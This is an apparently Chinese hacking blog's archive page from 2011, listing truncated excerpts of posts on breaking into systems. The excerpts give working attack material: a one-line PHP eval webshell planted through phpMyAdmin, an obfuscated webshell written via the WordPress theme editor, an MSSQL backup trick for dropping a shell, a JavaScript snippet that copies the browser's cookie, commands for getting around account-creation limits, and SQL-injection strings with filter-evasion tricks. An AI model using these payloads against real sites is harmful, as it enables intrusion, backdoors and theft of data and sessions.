本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

Category Archives: 技术文章

攻破天网防火墙的六种办法及解决办法!!!

2011.08.16 , , No Comments ,

天网是大家常用的防火墙软件,有许多人撰文提议安装天网,一时间天网防火墙成了菜鸟、高手必备工具。这样做当然好,至少说明了大家的网络安全意识提高了许多。但万事都有个“度”,超过这个“度”就不好了。现在有许多人对天网的迷信达到了痴迷的程度,认为安装了天网就高枕无忧了,他们在上网时只是打开天网,至于天网运行得怎么样就不管了。其实,就在此时你危险了! 一、堡垒往往是从内部被攻...

手工抓取COOKIE方法

2011.08.11 , , No Comments ,

javascript:alert;window.clipboardData.setData('text',document.cookie); 在IE里输入以上代码,然后直接用ctrl+V,粘贴出来的内容就是你所要抓的cookie了!

手工实现差异备份的步骤

2011.08.10 , , No Comments ,

字符型: 1、恢复当前库 ;alter database 当前库 set RECOVERY FULL– 2、建表cmd ;create table cmd (a image)– 3、备份当前库到D:\cmd1 ;backup log 当前库 to disk = ‘D:\cmd1′ with init– 4、插入一句话代码到创建的表cmd ;insert into cm...

利用脚本和命令绕过系统权限添加账号

2011.08.10 , , No Comments ,

有时候一些人对服务器的添加用户的NET和NET1权限做了限制,让很多菜鸟朋友们望而止步。其实个人感觉遇到这个问题都很容易解决的,在此我也共享出我的方法给大家。   cmd命令删除net和net1文件。一般删除之后系统会自动恢复文件,恢复的时候权限是系统重新默认的。大家就可以引用下面这段命令  1:del C:\WINDOWS\system32\net.exe 2:de...

wordpress 后台拿webshell

2011.08.10 , , No Comments ,

进入后台 后台-外观-编辑,找到404的问题插入马,马的代码: <script language=”php”>fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108)...

小方法“绕过龙盾防火墙”

2011.08.10 , , No Comments ,

今天的技术主要是结合网上的和自己的想法思路绕过”龙盾IIS防火墙“其他防火墙没试过 好的废话不多说实战开始, 手工注入,工具是不行啦, 第一咱先判断是否有注入点 http://***.com/newsShow.asp?ArticleID=120 ’ http://***.com/newsShow.asp?ArticleID=120 and 1=1 http://***...

phpmyadmin后台4种拿shell方法及php爆路径收集

2011.08.10 , , No Comments ,

php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?&...

防注入绕过必用11招

2011.08.10 , , No Comments ,

1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。 例如or 1=1即 %6f%72%20%31%3d%31 而Test也可以为 CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116) 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or” swords” =‘swords”,由于mssql的...

PHP+MySQL 手工注入语句大全

2011.08.10 , , No Comments ,

暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用): and 1=2 unio...